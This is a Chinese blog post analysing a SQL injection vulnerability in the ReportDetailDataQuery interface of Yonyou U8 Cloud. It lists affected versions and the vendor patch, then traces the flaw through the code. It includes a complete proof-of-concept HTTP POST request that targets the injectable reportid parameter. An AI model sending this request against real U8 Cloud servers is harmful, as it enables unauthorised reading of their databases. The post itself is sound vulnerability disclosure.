U8cloud系统ReportDetailDataQuery接口SQL注入漏洞分析

最新推荐文章于 2024-05-09 10:25:17 发布
最新推荐文章于 2024-05-09 10:25:17 发布
阅读量608 收藏 6
点赞数 8
文章标签: 网络 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42067124/article/details/135274708
版权

官网通告

一、漏洞描述

攻击者未经授权可以访问数据库中的数据,从而盗取用户数据,造成用户信息泄露。

二、影响版本

2.1,2.3,2.5,2.6,2.65,2.7,3.0,3.1,3.2,3.5,3.6,5.0

三、修复方案

升级补丁<U8CLOUD系统ReportDetailDataQuery接口存在SQL注入漏洞的安全补丁>

官方链接:https://security.yonyou.com/#/patchInfo?foreignKey=202b369a372c4ac4994ada096b25fa21

漏洞分析

定位ReportDetailDataQuery类

接受2个参数usercode和reportid,这里usercode会默认赋值不可控,存在问题的点是reportid

后续会调用gson.fromJson解析,所以请求内容必须为json格式,不然会报错

后面就是正常的调用queryVO进行sql查询

跟进查询方法

这里调用queryVOByPk 将reportformid值传入拼接sql后调用retrieveByClause进行查询

后续流程在JdbcPersistenceManager#buildSql中将查询的sql前面拼接成完整的select 语句进行查询

完整poc

POST /servlet/~iufo/nc.itf.iufo.mobilereport.data.ReportDetailDataQuery HTTP/1.1

Host: 172.18.60.85

Pragma: no-cache

Cache-Control: no-cache

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6

Connection: close

Content-Type: application/json

Content-Length: 29

{"usercode":1,"reportid":"*"}

补丁修复:

直接判断输入内容是否存在单引号

DFF_Team
关注
  • 8
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
漏洞复现】用友-U8C-Cloud-base64-sql注入
知黑而守白
03-14 130
用友U8Cloud是用友网络科技股份有限公司(简称“用友网络”)推出的一款云端企业管理软件。用友U8Cloud提供了全面的企业管理功能,包括财务管理、人力资源管理、供应链管理、采购管理、销售管理等。支持多种业务模式,适用于不同行业和企业规模的需求,帮助企业实现数字化转型和云端化管理。用友U8Cloud base64 接口存在SQL注入漏洞,该漏洞使得攻击者可以通过构造精心设计的恶意SQL语句,成功执行未经授权的数据库操作。此漏洞可能导致敏感信息泄露、数据库被篡改或其他安全风险。
用友U8 Cloud KeyWordReportQuery SQL注入漏洞复现
0xSec
02-27 348
用友U8 Cloud KeyWordReportQuery接口处存在SQL注入漏洞,未授权的攻击者可通过此漏洞获取数据库权限,从而盗取用户数据,造成用户信息泄露。
用友U8-cloud多个接口存在SQL注入
m0_46604997的博客
04-06 406
U8 cloud是用友推出的新一代云ERP,主要聚焦成长型、创新型企业,提供企业级云ERP整体解决方案,全面支持多组织业务协同、营销创新、智能财务、人力服务,构建产业链制造平台,融合用友云服务,实现企业互联网资源连接、共享、协同,赋能中国成长型企业高速发展、云化创新。U8 cloud 多个接口处存在SQL注入漏洞。攻击者可以窃取用户的隐私信息、业务数据等,造成用户信息泄露等网络安全相关问题,更严重的是数据库服务器控制有很大风险被攻击者控制。
用友U8-Cloud接口FileServlet存在任意文件读取漏洞(含批量验证poc)_用友u8-cloud fileservlet接口存在任意文件读取漏洞
m0_60229361的博客
04-16 455
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
用友GRP-U8 SQL注入漏洞复现
10-20 433
用友GRP-U8R10行政事业财务管理软件是用友公司专注于国家电子政务事业,基于云计算技术所推出的新一代产品,是我国行政事业财务领域最专业的政府财务管理软件。
用友U8 Cloud MeasureQueryByToolAction SQL注入漏洞复现(XVE-2024-4628)
qq_39894062的博客
04-01 500
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
用友U8 Cloud ReportDetailDataQuery SQL注入漏洞复现(QVD-2023-47860)
0xSec
02-05 596
用友U8 cloud ReportDetailDataQuery接口处存在SQL注入漏洞,攻击者未经授权可以访问数据库中的数据,从而盗取用户数据,造成用户信息泄露。
用友U8 Cloud SQL注入漏洞复现
12-06 365
用友U8 Cloud是用友推出的新一代云ERP,主要聚焦成长型、创新型企业,提供企业级云ERP整体解决方案。
漏洞复现用友U8_cloud_KeyWordDetailReportQuery_SQL注入漏洞
weixin_45530380的博客
01-03 510
【代码】【漏洞复现用友U8_cloud_KeyWordDetailReportQuery_SQL注入漏洞
用友U8 cloud KeyWordDetailReportQuery SQL注入漏洞复现
0xSec
12-28 816
用友U8 cloud KeyWordDetailReportQuery 接口处存在SQL注入漏洞,攻击者未经授权可以访问数据库中的数据,从而盗取用户数据,造成用户信息泄露。
【高危】用友 U8 Cloud、GRP-U8、A++V8.31存在多个高危漏洞
murphysec的博客
06-07 1645
墨菲安全是一家为您提供专业的软件供应链安全管理的科技公司,核心团队来自百度、华为、乌云等企业,公司为客户提供完整的软件供应链安全管理平台,围绕SBOM提供软件全生命周期的安全管理,平台能力包括软件成分分析、源安全管理、容器镜像检测、漏洞情报预警及商业软件供应链准入评估等多个产品。用友 GRP-U8 存在3个高危漏洞,分别为forgetPassword_old.jsp SQL注入漏洞、XML实体注入漏洞、XXNode SQL注入漏洞。用友@[GRP-U8, GRP-U8]
U8 cloud linux系统安装及部署指南
07-21
U8 cloud linux系统安装及部署指南
U8 cloud 1.0二次开发接口.pdf
02-16
U8 cloud 1.0二次开发接口
最新U8cloud 数据字典数据表说明2.5
12-15
最新U8cloud 数据字典数据表说明2.5,于2018年12月上传
U8Cloud 插件到货单
04-28
到货单将表体存货进行拆行,实现一物一码
U8Cloud常见开发的示例
04-28
U8Cloud常见开发的示例
漏洞复现用友U8Cloud base64 SQL注入漏洞
qq_67810151的博客
03-19 495
用友U8 Cloud 存在SQL注入漏洞,未授权的攻击者可通过此漏洞获取数据库权限,从而盗取用户数据,造成用户信息泄露。
用友U8-Cloud api/hr接口存在SQL注入漏洞复现
最新发布
m0_50488257的博客
05-09 307
在公众号上看见有人分享了U8-Cloud漏洞,看发布日期很新,再加上前几天刚弄过一个U8-Cloud站点,复现了看看。放包,发现sqlserver的版本信息。
用友U8 Cloud base64 SQL注入漏洞复现
0xSec
03-13 779
用友U8 Cloudbase64接口处存在SQL注入漏洞,未授权的攻击者可通过此漏洞获取数据库权限,从而盗取用户数据,造成用户信息泄露。
u8cloud二次开发
11-01
U8Cloud是一款企业级云ERP系统,支持二次开发。二次开发可以通过自定义API接口来实现,具体步骤如下: 1. 在工程的public源码目录中新增自定义API接口的实现类,实现IAPICustmerDevelop接口。 2. 在实现类中编写自定义API接口的具体逻辑。 3. 在U8Cloud系统中配置自定义API接口,包括接口名称、请求方式、请求参数等。 4. 在客户端调用自定义API接口,获取返回结果。 需要注意的是,二次开发需要具备一定的Java编程能力和U8Cloud系统的相关知识。同时,开发过程中需要遵循U8Cloud的开发规范和安全规范,确保二次开发的稳定性和安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值